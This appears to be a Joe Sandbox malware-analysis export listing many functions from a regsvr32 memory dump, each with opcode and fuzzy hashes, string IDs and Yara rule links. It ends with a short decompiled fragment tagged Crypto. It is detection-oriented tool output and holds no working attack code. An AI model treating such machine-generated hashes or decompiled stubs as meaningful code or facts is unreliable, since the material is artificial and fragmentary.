                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #T$(Pv0
                                                                                                                                                                                                            • API String ID: 0-2531358951
                                                                                                                                                                                                            • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                            • Instruction ID: 0c35dab067143e328079e2d2426f8ca1b7b26d1e7dedd86feb345c8e1baf9cad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2512FB450030E8BDF58DF18C88A4DE3BA1FB6839CF251619EC4A96294D378D995CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EB07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gd$s=z
                                                                                                                                                                                                            • API String ID: 0-3301279615
                                                                                                                                                                                                            • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                            • Instruction ID: d82691c17b649ef39044b711def85d653807bfed07ca5255e9ca0810337e303c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC51E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E6138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: !oW!$ke&Q
                                                                                                                                                                                                            • API String ID: 0-419570616
                                                                                                                                                                                                            • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                            • Instruction ID: d088b6768387d3683a502d7d10c64f0634686ed7a4bcd7ed222d3a02a6c9c4f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8951D6B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E4758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ?j|$P
                                                                                                                                                                                                            • API String ID: 0-615948335
                                                                                                                                                                                                            • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                            • Instruction ID: 5bcae9a487628fdb6aeb554d85f72ce5a51a3924f079f6ed7a14c282cacf0612
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C41D3B490034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F8A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: j$[
                                                                                                                                                                                                            • API String ID: 0-3696242357
                                                                                                                                                                                                            • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                            • Instruction ID: 00011ce645bf9e6fd0225fafa70899c820b0976e860778118d888657eae74712
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC41D6B090074E8BDB48DF64C48A5DE7FB1FB58358F11861DE85AA6250D3B4D664CFC1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F5880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %$aI
                                                                                                                                                                                                            • API String ID: 0-3604358270
                                                                                                                                                                                                            • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                            • Instruction ID: b09e4f7a9abcd3413ef3c063d043593264e8724df69eec5b1352ce387941aa67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B41D7B090038A8BCF48CF64C99A5DE7BB1FB44358F114A2DF82A97350D3B49664CF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FC058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: + $S"
                                                                                                                                                                                                            • API String ID: 0-2880694137
                                                                                                                                                                                                            • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                            • Instruction ID: 1490754db6ee3e152a8e3f11dd940fd3080feb250b2680d13c0f52a043b9c68b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B551B6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE86AA6250D3B8D665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FB130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: =K$d%
                                                                                                                                                                                                            • API String ID: 0-2790768846
                                                                                                                                                                                                            • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                            • Instruction ID: 81bd57768e914263d7f5448a3ac686d8d23813532818c52fd3659c4e267b1045
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B41E5B090074E8BDF48CF64C88A5DE7BF1FB58358F10461DE86AA6250D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E95BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #|$`
                                                                                                                                                                                                            • API String ID: 0-1687004633
                                                                                                                                                                                                            • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                            • Instruction ID: d4aecc9c954021510aec086623e697f509fcb7635b607a2049862c1b00584b88
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5541D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FC44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: c$j~;
                                                                                                                                                                                                            • API String ID: 0-3832213246
                                                                                                                                                                                                            • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                            • Instruction ID: 559c62e283bc53b87a2fab81ca751be05e6b0ce27652fece6451312400aa2e7b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2441A5B480078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6A96250D3B49661CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E7C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: -h$W
                                                                                                                                                                                                            • API String ID: 0-4146498651
                                                                                                                                                                                                            • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                            • Instruction ID: f15c2974bb315bfa147d34f39a72f86afb0d8701fbd2b51b5e1e91d050e3baf2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6641B4B590038E9FDB44CFA8D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02908A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .$fp
                                                                                                                                                                                                            • API String ID: 0-3298127435
                                                                                                                                                                                                            • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                            • Instruction ID: b6d45fcc0b359b01edb54d6843c32036ef03e576d73b9152862b8f091dace2fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41F5B190470E8BDF48CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E8FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "$Zs
                                                                                                                                                                                                            • API String ID: 0-3922668666
                                                                                                                                                                                                            • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                            • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E7840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XW$s [
                                                                                                                                                                                                            • API String ID: 0-2366283936
                                                                                                                                                                                                            • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                            • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E4C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4V$jn(
                                                                                                                                                                                                            • API String ID: 0-2529302498
                                                                                                                                                                                                            • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                            • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EF65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: '$%6
                                                                                                                                                                                                            • API String ID: 0-1852427169
                                                                                                                                                                                                            • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                            • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E8A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: uS$J
                                                                                                                                                                                                            • API String ID: 0-437994327
                                                                                                                                                                                                            • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                            • Instruction ID: c7bde57e224b952e25e826f079483654cf0434a67b2040ca050df88d2801b861
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31C6B190034E8FDB84CF64C88A5DE7FB0FB28358F104619E859A6260D3B88695CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F0A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: +@$`.P
                                                                                                                                                                                                            • API String ID: 0-1189405855
                                                                                                                                                                                                            • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                            • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E3CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ^$R
                                                                                                                                                                                                            • API String ID: 0-3595634639
                                                                                                                                                                                                            • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                            • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E2FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: t^$w
                                                                                                                                                                                                            • API String ID: 0-1486493484
                                                                                                                                                                                                            • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                            • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F1924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                            • API String ID: 0-606707520
                                                                                                                                                                                                            • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                            • Instruction ID: 86876a63dec12c44d7aae430effa8a206fb00c46ce6766cb053042ec63dd81b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A223970D14709EFDB58DFA8C49A49EBBF1FF44348F40816DE80AAB290D7749A19CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}






                                                                                                                                                                                                            0x180008d28
                                                                                                                                                                                                            0x180008d2d
                                                                                                                                                                                                            0x180008d32
                                                                                                                                                                                                            0x180008d56
                                                                                                                                                                                                            0x180008d5d
                                                                                                                                                                                                            0x180008d70
                                                                                                                                                                                                            0x180008d91

                                                                                                                                                                                                            Memory Dump Source
